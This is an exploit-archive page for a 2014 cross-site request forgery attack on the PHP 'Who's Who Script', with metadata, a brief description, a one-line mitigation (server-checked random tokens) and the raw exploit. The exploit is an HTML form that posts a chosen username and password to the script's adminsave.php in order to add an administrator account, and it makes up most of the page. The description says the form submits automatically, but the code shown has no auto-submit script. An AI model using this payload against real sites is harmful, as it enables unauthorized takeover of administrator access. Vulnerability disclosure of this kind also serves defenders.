Who's Who Script CSRF Exploit (Add Admin Account)

vendor:

Who's Who Script

by:

ZoRLu

8,8

CVSS

HIGH

Cross-Site Request Forgery (CSRF)

352

CWE

Product Name: Who's Who Script

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2014

Who’s Who Script CSRF Exploit (Add Admin Account)

This exploit allows an attacker to add an admin account to the Who's Who Script by exploiting the CSRF vulnerability present in the ayarsave.php, uyesave.php, slaytadd.php, and slaytsave.php files. The attacker can craft a malicious HTML page that contains a form with the username and password fields and submit it to the vulnerable file. The form will be automatically submitted without the user's knowledge, and the attacker will be able to add an admin account to the Who's Who Script.

Mitigation:

The application should use a random token in the form that is checked on the server side to prevent CSRF attacks.

Source

Exploit-DB raw data:

# Title        : Who's Who Script CSRF Exploit (Add Admin Account)
# Author       : ZoRLu / zorlu@milw00rm.com / submit@milw00rm.com
# Home         : http://milw00rm.com / its online
# Date         : 30.10.2014
# Demo		   : http://demo.phpscriptlerim.com/free/whoswho/
# Download1	   : http://www.phpscriptlerim.com/download/indir.php?id=14
# Download2	   : https://yadi.sk/d/C8eQcvUeJjeZ2
# Thks         : exploit-db.com, packetstormsecurity.com, securityfocus.com, sebug.net and others
# Note		   : I write exploit for adminsave.php but other file has a vuln in /yonetim/plugins folder.
				 You can write exp. for other files.
# Vulnerable   : ayarsave.php, uyesave.php, slaytadd.php, slaytsave.php
# Not Vuln     : uyedel.php and slaytdel.php file's not vulnerable for CSRF. Because session control available to files

<head>
	<meta http-equiv="content-type" content="text/html; charset=utf-8" />
	<title>Who's Who Script CSRF Exploit (Add Admin Account)</title>
</head>

<body>

<div id="main">


	<div id="cols" class="box">

		<hr class="noscreen" />

		<div id="content" class="box">
			<h1>Admin Panel</h1>
			<br>
<br><br>
						<form method="post" action="http://localhost/filepath/yonetim/plugin/adminsave.php">
						<label><b>Username:</b></label><br>
						<input type="text" size="40" name="username" value="admin" class="input-text" /><br><br>
					
						<label><b>Password:</b></label><br>
						<input type="text" size="40" name="password" class="input-text" /><br><br>

						<input type="submit" class="input-submit" name="gonder" value="Save" />
						</form>
						
			<br><br>
		</div>

	</div>

	<hr class="noscreen" />

	<div id="footer" class="box">

		<p class="f-left">© Coded by ZoRLu</p>

		<p class="f-right"><a href="http://milw00rm.com" target="_blank">milw00rm.com</a></p>

	</div> 

</div>

</body>
</html>